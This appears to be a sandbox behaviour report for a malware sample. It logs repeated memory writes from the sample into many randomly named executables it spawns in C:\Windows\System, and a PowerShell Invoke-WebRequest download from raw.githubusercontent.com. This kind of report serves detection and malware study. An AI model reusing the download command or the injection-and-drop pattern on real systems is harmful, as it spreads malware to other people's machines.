PID 2196 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\ySEPBUs.exe
PID 2196 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\hwDwGpz.exe
PID 2196 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\hwDwGpz.exe
PID 2196 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\hwDwGpz.exe
PID 2196 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\OXIMvCN.exe
PID 2196 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\OXIMvCN.exe
PID 2196 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\OXIMvCN.exe
PID 2196 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\gJaZqcx.exe
PID 2196 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\gJaZqcx.exe
PID 2196 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\gJaZqcx.exe
PID 2196 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\mmgPhUr.exe
PID 2196 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\mmgPhUr.exe
PID 2196 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\mmgPhUr.exe
PID 2196 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\wtbMaTi.exe
PID 2196 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\wtbMaTi.exe
PID 2196 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\wtbMaTi.exe
PID 2196 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\UWblMKU.exe
PID 2196 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\UWblMKU.exe
PID 2196 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\UWblMKU.exe
PID 2196 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\xryNSlD.exe
PID 2196 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\xryNSlD.exe
PID 2196 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\xryNSlD.exe
PID 2196 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\HMrlYTT.exe
PID 2196 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\HMrlYTT.exe
PID 2196 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\HMrlYTT.exe
PID 2196 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\smiSLgQ.exe
PID 2196 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\smiSLgQ.exe
PID 2196 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\smiSLgQ.exe
PID 2196 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\poJhkXl.exe
PID 2196 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\poJhkXl.exe
PID 2196 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\poJhkXl.exe
PID 2196 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\YCNvqar.exe
PID 2196 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\YCNvqar.exe
PID 2196 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\YCNvqar.exe
PID 2196 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\pUfQfkn.exe
PID 2196 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\pUfQfkn.exe
PID 2196 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\pUfQfkn.exe
PID 2196 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\ZFXnwYe.exe
PID 2196 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\ZFXnwYe.exe
PID 2196 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\ZFXnwYe.exe
PID 2196 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\UkLCXyc.exe
PID 2196 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\UkLCXyc.exe
PID 2196 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\UkLCXyc.exe
PID 2196 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\kLmZeaz.exe
PID 2196 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\kLmZeaz.exe
PID 2196 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\kLmZeaz.exe
PID 2196 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\pEEfbXR.exe
PID 2196 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\pEEfbXR.exe
PID 2196 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\pEEfbXR.exe
PID 2196 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\gTCAyvO.exe
PID 2196 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\gTCAyvO.exe
PID 2196 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\gTCAyvO.exe
PID 2196 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\qgOZnMX.exe
PID 2196 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\qgOZnMX.exe
PID 2196 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\qgOZnMX.exe
PID 2196 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\rixMtLF.exe

Processes

C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\SaGdFru.exe

C:\Windows\System\SaGdFru.exe

C:\Windows\System\ySEPBUs.exe

C:\Windows\System\ySEPBUs.exe

C:\Windows\System\hwDwGpz.exe

C:\Windows\System\hwDwGpz.exe

C:\Windows\System\OXIMvCN.exe

C:\Windows\System\OXIMvCN.exe

C:\Windows\System\gJaZqcx.exe

C:\Windows\System\gJaZqcx.exe

C:\Windows\System\mmgPhUr.exe

C:\Windows\System\mmgPhUr.exe

C:\Windows\System\wtbMaTi.exe

C:\Windows\System\wtbMaTi.exe

C:\Windows\System\UWblMKU.exe

C:\Windows\System\UWblMKU.exe

C:\Windows\System\xryNSlD.exe

C:\Windows\System\xryNSlD.exe

C:\Windows\System\HMrlYTT.exe

C:\Windows\System\HMrlYTT.exe

C:\Windows\System\smiSLgQ.exe

C:\Windows\System\smiSLgQ.exe

C:\Windows\System\poJhkXl.exe

C:\Windows\System\poJhkXl.exe

C:\Windows\System\YCNvqar.exe

C:\Windows\System\YCNvqar.exe

C:\Windows\System\pUfQfkn.exe

C:\Windows\System\pUfQfkn.exe

C:\Windows\System\ZFXnwYe.exe

C:\Windows\System\ZFXnwYe.exe

C:\Windows\System\UkLCXyc.exe

C:\Windows\System\UkLCXyc.exe

C:\Windows\System\kLmZeaz.exe

C:\Windows\System\kLmZeaz.exe

C:\Windows\System\pEEfbXR.exe

C:\Windows\System\pEEfbXR.exe

C:\Windows\System\gTCAyvO.exe

C:\Windows\System\gTCAyvO.exe

C:\Windows\System\qgOZnMX.exe

C:\Windows\System\qgOZnMX.exe

C:\Windows\System\rixMtLF.exe

C:\Windows\System\rixMtLF.exe

C:\Windows\System\lPvhgkD.exe

C:\Windows\System\lPvhgkD.exe

C:\Windows\System\hkJMpDu.exe

C:\Windows\System\hkJMpDu.exe

C:\Windows\System\seGZyPG.exe

C:\Windows\System\seGZyPG.exe

C:\Windows\System\zoEBvre.exe

C:\Windows\System\zoEBvre.exe

C:\Windows\System\WhRyIFF.exe

C:\Windows\System\WhRyIFF.exe

C:\Windows\System\epfFlsR.exe

C:\Windows\System\epfFlsR.exe

C:\Windows\System\BVKbfKl.exe

C:\Windows\System\BVKbfKl.exe

C:\Windows\System\gwoRNsk.exe

C:\Windows\System\gwoRNsk.exe

C:\Windows\System\QlhXaDE.exe

C:\Windows\System\QlhXaDE.exe

C:\Windows\System\flCAdqM.exe

C:\Windows\System\flCAdqM.exe

C:\Windows\System\GpYlcpA.exe

C:\Windows\System\GpYlcpA.exe

C:\Windows\System\zsTQSfg.exe

C:\Windows\System\zsTQSfg.exe

C:\Windows\System\askiGRV.exe

C:\Windows\System\askiGRV.exe

C:\Windows\System\djYelDT.exe

C:\Windows\System\djYelDT.exe

C:\Windows\System\NogQCTo.exe

C:\Windows\System\NogQCTo.exe

C:\Windows\System\LHwlBdA.exe

C:\Windows\System\LHwlBdA.exe

C:\Windows\System\jfEFViD.exe

C:\Windows\System\jfEFViD.exe

C:\Windows\System\Gyzijzt.exe

C:\Windows\System\Gyzijzt.exe

C:\Windows\System\qaBlhVa.exe

C:\Windows\System\qaBlhVa.exe

C:\Windows\System\bzifaJW.exe

C:\Windows\System\bzifaJW.exe

C:\Windows\System\GyklXLO.exe

C:\Windows\System\GyklXLO.exe

C:\Windows\System\prttWPR.exe

C:\Windows\System\prttWPR.exe

C:\Windows\System\XWcxnih.exe

C:\Windows\System\XWcxnih.exe

C:\Windows\System\MCQjKyo.exe

C:\Windows\System\MCQjKyo.exe

C:\Windows\System\pwUBeNN.exe

C:\Windows\System\pwUBeNN.exe

C:\Windows\System\XPUHGqQ.exe

C:\Windows\System\XPUHGqQ.exe

C:\Windows\System\YsHIFnQ.exe

C:\Windows\System\YsHIFnQ.exe

C:\Windows\System\TZiucLU.exe

C:\Windows\System\TZiucLU.exe

C:\Windows\System\pfTMLjb.exe

C:\Windows\System\pfTMLjb.exe

C:\Windows\System\OVfJaxr.exe

C:\Windows\System\OVfJaxr.exe

C:\Windows\System\ZeyZkET.exe

C:\Windows\System\ZeyZkET.exe

C:\Windows\System\MNfVUzt.exe

C:\Windows\System\MNfVUzt.exe

C:\Windows\System\xZiOADO.exe

C:\Windows\System\xZiOADO.exe

C:\Windows\System\oGLBtVT.exe

C:\Windows\System\oGLBtVT.exe

C:\Windows\System\brwaOFj.exe

C:\Windows\System\brwaOFj.exe

C:\Windows\System\kcjfwLh.exe

C:\Windows\System\kcjfwLh.exe

C:\Windows\System\tSOzyeA.exe

C:\Windows\System\tSOzyeA.exe

C:\Windows\System\QPVJENK.exe

C:\Windows\System\QPVJENK.exe

C:\Windows\System\CXcIgVR.exe

C:\Windows\System\CXcIgVR.exe

C:\Windows\System\BNCbUPE.exe

C:\Windows\System\BNCbUPE.exe

C:\Windows\System\VKvHNeb.exe

C:\Windows\System\VKvHNeb.exe

C:\Windows\System\rPKaoha.exe

C:\Windows\System\rPKaoha.exe

C:\Windows\System\kmRgCdN.exe

C:\Windows\System\kmRgCdN.exe

C:\Windows\System\RXLMJni.exe

C:\Windows\System\RXLMJni.exe

C:\Windows\System\IWXOiFr.exe

C:\Windows\System\IWXOiFr.exe

C:\Windows\System\YLtkswf.exe

C:\Windows\System\YLtkswf.exe

C:\Windows\System\imrjfAg.exe

C:\Windows\System\imrjfAg.exe

C:\Windows\System\XxIlbLy.exe

C:\Windows\System\XxIlbLy.exe

C:\Windows\System\uWrabcy.exe

C:\Windows\System\uWrabcy.exe

C:\Windows\System\WTBqiyH.exe

C:\Windows\System\WTBqiyH.exe

C:\Windows\System\NIKTzBW.exe

C:\Windows\System\NIKTzBW.exe

C:\Windows\System\cKeXZNV.exe

C:\Windows\System\cKeXZNV.exe

C:\Windows\System\TYOvuie.exe

C:\Windows\System\TYOvuie.exe

C:\Windows\System\Qgicvky.exe

C:\Windows\System\Qgicvky.exe

C:\Windows\System\risTJFs.exe

C:\Windows\System\risTJFs.exe

C:\Windows\System\aZDPAJF.exe

C:\Windows\System\aZDPAJF.exe

C:\Windows\System\ojARqnw.exe

C:\Windows\System\ojARqnw.exe

C:\Windows\System\VVCyteB.exe

C:\Windows\System\VVCyteB.exe

C:\Windows\System\ngFsCTZ.exe

C:\Windows\System\ngFsCTZ.exe

C:\Windows\System\yqfSyar.exe

C:\Windows\System\yqfSyar.exe

C:\Windows\System\mMPrMQW.exe

C:\Windows\System\mMPrMQW.exe

C:\Windows\System\RZnHaQu.exe

C:\Windows\System\RZnHaQu.exe

C:\Windows\System\fMrNtxA.exe

C:\Windows\System\fMrNtxA.exe

C:\Windows\System\JCTrwRT.exe

C:\Windows\System\JCTrwRT.exe

C:\Windows\System\EWGjxZe.exe

C:\Windows\System\EWGjxZe.exe

C:\Windows\System\bTtZSgR.exe

C:\Windows\System\bTtZSgR.exe

C:\Windows\System\YhWMCpF.exe

C:\Windows\System\YhWMCpF.exe

C:\Windows\System\mHhSvpi.exe

C:\Windows\System\mHhSvpi.exe

C:\Windows\System\ijRuTEq.exe

C:\Windows\System\ijRuTEq.exe

C:\Windows\System\uKEuCBJ.exe

C:\Windows\System\uKEuCBJ.exe

C:\Windows\System\nnGwwKy.exe

C:\Windows\System\nnGwwKy.exe

C:\Windows\System\ycuPXPu.exe

C:\Windows\System\ycuPXPu.exe

C:\Windows\System\fkXwZUi.exe

C:\Windows\System\fkXwZUi.exe

C:\Windows\System\ariGJwc.exe

C:\Windows\System\ariGJwc.exe

C:\Windows\System\HVZXqVN.exe

C:\Windows\System\HVZXqVN.exe

C:\Windows\System\KjqpsjX.exe

C:\Windows\System\KjqpsjX.exe

C:\Windows\System\gYiRNLp.exe

C:\Windows\System\gYiRNLp.exe

C:\Windows\System\FebLZQA.exe

C:\Windows\System\FebLZQA.exe

C:\Windows\System\BmlvvmT.exe

C:\Windows\System\BmlvvmT.exe

C:\Windows\System\RiTjOjU.exe

C:\Windows\System\RiTjOjU.exe

C:\Windows\System\rbKofyt.exe

C:\Windows\System\rbKofyt.exe

C:\Windows\System\XeuiLcY.exe

C:\Windows\System\XeuiLcY.exe

C:\Windows\System\MckjWxc.exe

C:\Windows\System\MckjWxc.exe

C:\Windows\System\AQPRMvi.exe

C:\Windows\System\AQPRMvi.exe

C:\Windows\System\ZvMpFoz.exe

C:\Windows\System\ZvMpFoz.exe

C:\Windows\System\ccSSrOW.exe

C:\Windows\System\ccSSrOW.exe

C:\Windows\System\jZYFzvq.exe

C:\Windows\System\jZYFzvq.exe

C:\Windows\System\vZJwqmK.exe

C:\Windows\System\vZJwqmK.exe

C:\Windows\System\SwpPhiT.exe

C:\Windows\System\SwpPhiT.exe

C:\Windows\System\DuKJxvz.exe

C:\Windows\System\DuKJxvz.exe

C:\Windows\System\pyfJAkA.exe

C:\Windows\System\pyfJAkA.exe

C:\Windows\System\JfSCBYs.exe

C:\Windows\System\JfSCBYs.exe

C:\Windows\System\TMKtnhQ.exe

C:\Windows\System\TMKtnhQ.exe

C:\Windows\System\YWBpsPX.exe

C:\Windows\System\YWBpsPX.exe

C:\Windows\System\SxOoDxQ.exe

C:\Windows\System\SxOoDxQ.exe

C:\Windows\System\hzznkTq.exe

C:\Windows\System\hzznkTq.exe

C:\Windows\System\EHkHuEN.exe

C:\Windows\System\EHkHuEN.exe

C:\Windows\System\hGTgawc.exe

C:\Windows\System\hGTgawc.exe

C:\Windows\System\UuAmUkz.exe

C:\Windows\System\UuAmUkz.exe

C:\Windows\System\lcpezzv.exe

C:\Windows\System\lcpezzv.exe

C:\Windows\System\lGARijo.exe

C:\Windows\System\lGARijo.exe

C:\Windows\System\XmgcVUZ.exe

C:\Windows\System\XmgcVUZ.exe

C:\Windows\System\WdpDgDX.exe

C:\Windows\System\WdpDgDX.exe

C:\Windows\System\jNgNMLH.exe

C:\Windows\System\jNgNMLH.exe

C:\Windows\System\uGGZEdQ.exe

C:\Windows\System\uGGZEdQ.exe

C:\Windows\System\bkhjekZ.exe

C:\Windows\System\bkhjekZ.exe

C:\Windows\System\EodpZoN.exe

C:\Windows\System\EodpZoN.exe

C:\Windows\System\glRJYbY.exe

C:\Windows\System\glRJYbY.exe

C:\Windows\System\wBKuzYw.exe

C:\Windows\System\wBKuzYw.exe

C:\Windows\System\atAxaaB.exe

C:\Windows\System\atAxaaB.exe

C:\Windows\System\jgPxCvi.exe

C:\Windows\System\jgPxCvi.exe

C:\Windows\System\NJWpAAt.exe

C:\Windows\System\NJWpAAt.exe

C:\Windows\System\eNskvjQ.exe

C:\Windows\System\eNskvjQ.exe

C:\Windows\System\lwdnOOI.exe

C:\Windows\System\lwdnOOI.exe

C:\Windows\System\Eygyahh.exe

C:\Windows\System\Eygyahh.exe

C:\Windows\System\YknrDtz.exe

C:\Windows\System\YknrDtz.exe

C:\Windows\System\Wontcee.exe

C:\Windows\System\Wontcee.exe

C:\Windows\System\ynlrsiB.exe

C:\Windows\System\ynlrsiB.exe

C:\Windows\System\xqVLwDr.exe

C:\Windows\System\xqVLwDr.exe

C:\Windows\System\bVIpvuU.exe

C:\Windows\System\bVIpvuU.exe

C:\Windows\System\LQnZbjk.exe

C:\Windows\System\LQnZbjk.exe

C:\Windows\System\GnzwJPW.exe

C:\Windows\System\GnzwJPW.exe

C:\Windows\System\ckGjObk.exe

C:\Windows\System\ckGjObk.exe

C:\Windows\System\lHCeIbL.exe

C:\Windows\System\lHCeIbL.exe

C:\Windows\System\VlzJmeI.exe

C:\Windows\System\VlzJmeI.exe

C:\Windows\System\cOQITTD.exe

C:\Windows\System\cOQITTD.exe

C:\Windows\System\FamIWrl.exe

C:\Windows\System\FamIWrl.exe

C:\Windows\System\RCwMEdK.exe

C:\Windows\System\RCwMEdK.exe

C:\Windows\System\PgvbIiR.exe

C:\Windows\System\PgvbIiR.exe

C:\Windows\System\SnGCaCY.exe

C:\Windows\System\SnGCaCY.exe

C:\Windows\System\XEepZCy.exe

C:\Windows\System\XEepZCy.exe

C:\Windows\System\mNQKFvi.exe

C:\Windows\System\mNQKFvi.exe

C:\Windows\System\Cdhrutt.exe

C:\Windows\System\Cdhrutt.exe

C:\Windows\System\MepnMUO.exe

C:\Windows\System\MepnMUO.exe

C:\Windows\System\NWBJQae.exe

C:\Windows\System\NWBJQae.exe

C:\Windows\System\ClsVqLX.exe

C:\Windows\System\ClsVqLX.exe

C:\Windows\System\CgjIMpc.exe

C:\Windows\System\CgjIMpc.exe

C:\Windows\System\arXLVje.exe

C:\Windows\System\arXLVje.exe

C:\Windows\System\HJXTVIA.exe

C:\Windows\System\HJXTVIA.exe

C:\Windows\System\BlrKgny.exe

C:\Windows\System\BlrKgny.exe

C:\Windows\System\uDJydfz.exe

C:\Windows\System\uDJydfz.exe

C:\Windows\System\phhomer.exe

C:\Windows\System\phhomer.exe

C:\Windows\System\azYtkoE.exe

C:\Windows\System\azYtkoE.exe

C:\Windows\System\SMfmTnh.exe

C:\Windows\System\SMfmTnh.exe

C:\Windows\System\fFNxQZy.exe

C:\Windows\System\fFNxQZy.exe

C:\Windows\System\IQDAiun.exe

C:\Windows\System\IQDAiun.exe

C:\Windows\System\IqfHwCt.exe

C:\Windows\System\IqfHwCt.exe

C:\Windows\System\ufJzBxu.exe

C:\Windows\System\ufJzBxu.exe

C:\Windows\System\LZjuvYy.exe

C:\Windows\System\LZjuvYy.exe

C:\Windows\System\pgrUkMT.exe

C:\Windows\System\pgrUkMT.exe

C:\Windows\System\UXJrerL.exe

C:\Windows\System\UXJrerL.exe

C:\Windows\System\NcKOide.exe

C:\Windows\System\NcKOide.exe

C:\Windows\System\cahVJAV.exe

C:\Windows\System\cahVJAV.exe

C:\Windows\System\EvNHOdM.exe

C:\Windows\System\EvNHOdM.exe

C:\Windows\System\SMWmcyN.exe

C:\Windows\System\SMWmcyN.exe

C:\Windows\System\wboCNln.exe

C:\Windows\System\wboCNln.exe

C:\Windows\System\kENbfAL.exe

C:\Windows\System\kENbfAL.exe

C:\Windows\System\BkqOnjO.exe

C:\Windows\System\BkqOnjO.exe

C:\Windows\System\sGwHlPl.exe

C:\Windows\System\sGwHlPl.exe

C:\Windows\System\EKKiJuk.exe

C:\Windows\System\EKKiJuk.exe

C:\Windows\System\rYLHzZg.exe

C:\Windows\System\rYLHzZg.exe

C:\Windows\System\mThLpME.exe

C:\Windows\System\mThLpME.exe

C:\Windows\System\QqvPSmJ.exe

C:\Windows\System\QqvPSmJ.exe

C:\Windows\System\DyJDVLt.exe

C:\Windows\System\DyJDVLt.exe

C:\Windows\System\IOZcNId.exe

C:\Windows\System\IOZcNId.exe

C:\Windows\System\tIfgbLB.exe

C:\Windows\System\tIfgbLB.exe

C:\Windows\System\ziFRnCa.exe

C:\Windows\System\ziFRnCa.exe

C:\Windows\System\peqARcM.exe

C:\Windows\System\peqARcM.exe

C:\Windows\System\MrnzdkD.exe

C:\Windows\System\MrnzdkD.exe

C:\Windows\System\fYZoGmM.exe

C:\Windows\System\fYZoGmM.exe

C:\Windows\System\caYTUZW.exe

C:\Windows\System\caYTUZW.exe

C:\Windows\System\ACRJajf.exe

C:\Windows\System\ACRJajf.exe

C:\Windows\System\uZALuVy.exe

C:\Windows\System\uZALuVy.exe

C:\Windows\System\ysKwxpZ.exe

C:\Windows\System\ysKwxpZ.exe

C:\Windows\System\YIJiEif.exe

C:\Windows\System\YIJiEif.exe

C:\Windows\System\lOCbhYp.exe

C:\Windows\System\lOCbhYp.exe

C:\Windows\System\HSihtvF.exe

C:\Windows\System\HSihtvF.exe

C:\Windows\System\EHSPPFY.exe

C:\Windows\System\EHSPPFY.exe

C:\Windows\System\WMjDTEa.exe

C:\Windows\System\WMjDTEa.exe

C:\Windows\System\MMKOLyd.exe

C:\Windows\System\MMKOLyd.exe

C:\Windows\System\jclQzRM.exe

C:\Windows\System\jclQzRM.exe

C:\Windows\System\aRIIxzl.exe

C:\Windows\System\aRIIxzl.exe

C:\Windows\System\cwEPVSB.exe

C:\Windows\System\cwEPVSB.exe

C:\Windows\System\GUMnaKE.exe

C:\Windows\System\GUMnaKE.exe

C:\Windows\System\PPzQXKg.exe

C:\Windows\System\PPzQXKg.exe

C:\Windows\System\XvluXVE.exe

C:\Windows\System\XvluXVE.exe

C:\Windows\System\UZPznBk.exe

C:\Windows\System\UZPznBk.exe

C:\Windows\System\EzDBaAS.exe

C:\Windows\System\EzDBaAS.exe

C:\Windows\System\nyazEfg.exe

C:\Windows\System\nyazEfg.exe

C:\Windows\System\OoNWQIu.exe

C:\Windows\System\OoNWQIu.exe

C:\Windows\System\DariVoO.exe

C:\Windows\System\DariVoO.exe

C:\Windows\System\TnNCxrP.exe

C:\Windows\System\TnNCxrP.exe

C:\Windows\System\jDtXDno.exe

C:\Windows\System\jDtXDno.exe

C:\Windows\System\ZaBeUTC.exe

C:\Windows\System\ZaBeUTC.exe

C:\Windows\System\MsdCCwU.exe

C:\Windows\System\MsdCCwU.exe

C:\Windows\System\ugwtOSu.exe

C:\Windows\System\ugwtOSu.exe

C:\Windows\System\LHwIXQp.exe

C:\Windows\System\LHwIXQp.exe

C:\Windows\System\qjKmbNl.exe

C:\Windows\System\qjKmbNl.exe

C:\Windows\System\BwZFiuT.exe

C:\Windows\System\BwZFiuT.exe

C:\Windows\System\EBmJZOR.exe

C:\Windows\System\EBmJZOR.exe

C:\Windows\System\XbxPsWW.exe

C:\Windows\System\XbxPsWW.exe

C:\Windows\System\nWebvmR.exe

C:\Windows\System\nWebvmR.exe

C:\Windows\System\OhQvdgg.exe

C:\Windows\System\OhQvdgg.exe

C:\Windows\System\VBqSHrc.exe

C:\Windows\System\VBqSHrc.exe

C:\Windows\System\yfjElVu.exe

C:\Windows\System\yfjElVu.exe

C:\Windows\System\fsDIzTz.exe

C:\Windows\System\fsDIzTz.exe

C:\Windows\System\IGJtPvi.exe

C:\Windows\System\IGJtPvi.exe

C:\Windows\System\hvxOZuF.exe

C:\Windows\System\hvxOZuF.exe

C:\Windows\System\dJiqoFY.exe

C:\Windows\System\dJiqoFY.exe

C:\Windows\System\tANWrDd.exe

C:\Windows\System\tANWrDd.exe

C:\Windows\System\vdlkvaj.exe

C:\Windows\System\vdlkvaj.exe

C:\Windows\System\FvxwAbV.exe

C:\Windows\System\FvxwAbV.exe

C:\Windows\System\zjrcTBb.exe

C:\Windows\System\zjrcTBb.exe

C:\Windows\System\FRrnJUD.exe

C:\Windows\System\FRrnJUD.exe

C:\Windows\System\CWVMXjf.exe

C:\Windows\System\CWVMXjf.exe

C:\Windows\System\JPvBgJD.exe

C:\Windows\System\JPvBgJD.exe

C:\Windows\System\aOJCRdb.exe

C:\Windows\System\aOJCRdb.exe

C:\Windows\System\mqyoBPJ.exe

C:\Windows\System\mqyoBPJ.exe

C:\Windows\System\tylFxbo.exe

C:\Windows\System\tylFxbo.exe

C:\Windows\System\TVnwnuj.exe

C:\Windows\System\TVnwnuj.exe

C:\Windows\System\fVUares.exe

